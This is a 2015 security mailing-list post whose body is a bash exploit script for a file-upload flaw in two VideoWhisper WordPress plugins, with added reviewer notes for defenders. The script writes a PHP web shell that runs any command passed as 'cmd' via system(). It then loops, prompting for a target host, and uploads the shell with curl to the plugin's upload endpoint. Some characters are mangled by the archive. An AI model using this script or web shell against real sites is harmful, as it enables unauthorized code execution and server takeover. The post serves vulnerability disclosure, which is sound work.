Date: Sat, 18 Apr 2015 06:06:13 -0700
From: "Larry W. Cashdollar" <larry0@...com>
To: Open Source Security <oss-security@...ts.openwall.com>
Subject: Exploit for VideoWhisper WP plugins file upload incomplete fix.

#!/bin/bash
#A quick Exploit for the VideoWhisper file upload incomplete fix I posted a few weeks ago.
#Larry W. Cashdollar v1.0
#
# Reviewer summary: proof of concept for an incomplete upload-filter fix in two
# VideoWhisper WordPress plugins (the banner below ties it to CVE-2014-1905 and
# bid 53851). The script writes a PHP file with a .pht extension, then loops:
# it prompts for a host, a plugin choice and a filename, and sends a multipart
# POST with curl to that plugin's vw_upload.php.
#
# Notes for defenders, derived from the lines below:
#  - The issue depends on the web server handing .pht/.phtml files to the PHP
#    handler, which the banner attributes to php5.conf on Debian/Ubuntu.
#    Restricting the handler to .php, or disabling script execution in
#    directories that accept uploads, removes that precondition.
#  - Access-log indicator: POST requests to .../vc/vw_upload.php or
#    .../vp/vw_upload.php under wp-content/plugins/, followed by requests for
#    .pht/.phtml files in those plugin directories.
#  - An extension blocklist that lists only .php is the "incomplete fix" named
#    in the subject; an allowlist of expected media types is the sturdier check.

# Writes shell.pht into the current working directory, replacing any existing
# file of that name. The here-document delimiter (-EOF-) is unquoted, so the
# shell expands the body; the backslashes before each $ keep the PHP variable
# names literal. The PHP body passes the "cmd" request parameter to system()
# and wraps the output in <pre>.
# NOTE(review): the quote characters around cmd are typographic in this
# archived copy; the here-document is reproduced exactly as archived.
cat > shell.pht << -EOF-
<?php
if(isset(\$_REQUEST[‘cmd’])){
        echo "<pre>";
        \$cmd = (\$_REQUEST[‘cmd’]);
        system(\$cmd);
        echo "</pre>";
} else { echo "Please supply a command cmd"; }
?>
-EOF-

# ANSI colour escapes, interpreted by the `echo -e` calls in the banner.
red='\033[0;31m'
NC='\033[0m' # No Color

# `[ true ]` tests a non-empty string, so the loop only ends on Ctrl-C.
# Each pass prints the banner, reads three values and issues one upload request.
while [ true ]; do 
echo -e ${red};
echo -e "				VideoWhisper Remote File Upload PoC Redux $NC";
echo "						4/14/2015";
echo "					   Larry W. Cashdollar, @_larry0";
echo
echo
echo "Linux OSs like Debian or Ubuntu have .phtml, .pht defined as";
echo "SetHandler application/x-httpd-php in php5.conf";
echo "So WP instances hosted on thos OSs are still vulnerable to CVE-2014-1905";
echo "and bid 53851.";
echo "		     - Advisories -";
echo "http://www.vapid.dhs.org/blog/04-16-2015/";
echo "http://www.vapid.dhs.org/advisory.php?v=116";
echo "http://www.vapid.dhs.org/advisory.php?v=117";
echo 
echo
echo "Ctrl ^C to exit";
# The three prompts are read without -r and used unvalidated and unquoted below.
echo -n "Enter Target Hostname :";
read target;
echo -n "Enter 1 for integration 2 for presentation :";
read plugin;
echo -n "Enter payload filename or (shell.pht):";
read file;
echo "[+] Hostname $target";
echo "[+] File $file";
# Only the value 1 selects the conference-integration path; any other input
# falls through to the presentation plugin path.
if [ $plugin == 1 ]; then
echo "[+] Targeting Video Conference Plugin";
echo
	# Multipart POST over plain http with fields vw_file, name and room.
	# NOTE(review): the vw_file value reads "@...le" on this page, which looks
	# like the list archive's e-mail address masking rather than the author's
	# text; it is left as archived. What the server does with room=./ is not
	# shown here.
	curl --form "vw_file=@...le" --form "name=$file" --form "room=./" http://$target/wp-content/plugins/videowhisper-video-conference-integration/vc/vw_upload.php
else
echo "[+] Targeting Video Presentation Plugin";
echo
	# Same request shape as above, sent to the presentation plugin's endpoint.
	curl --form "vw_file=@...le" --form "name=$file" --form "room=./" http://$target/wp-content/plugins/videowhisper-video-presentation/vp/vw_upload.php
fi;
done
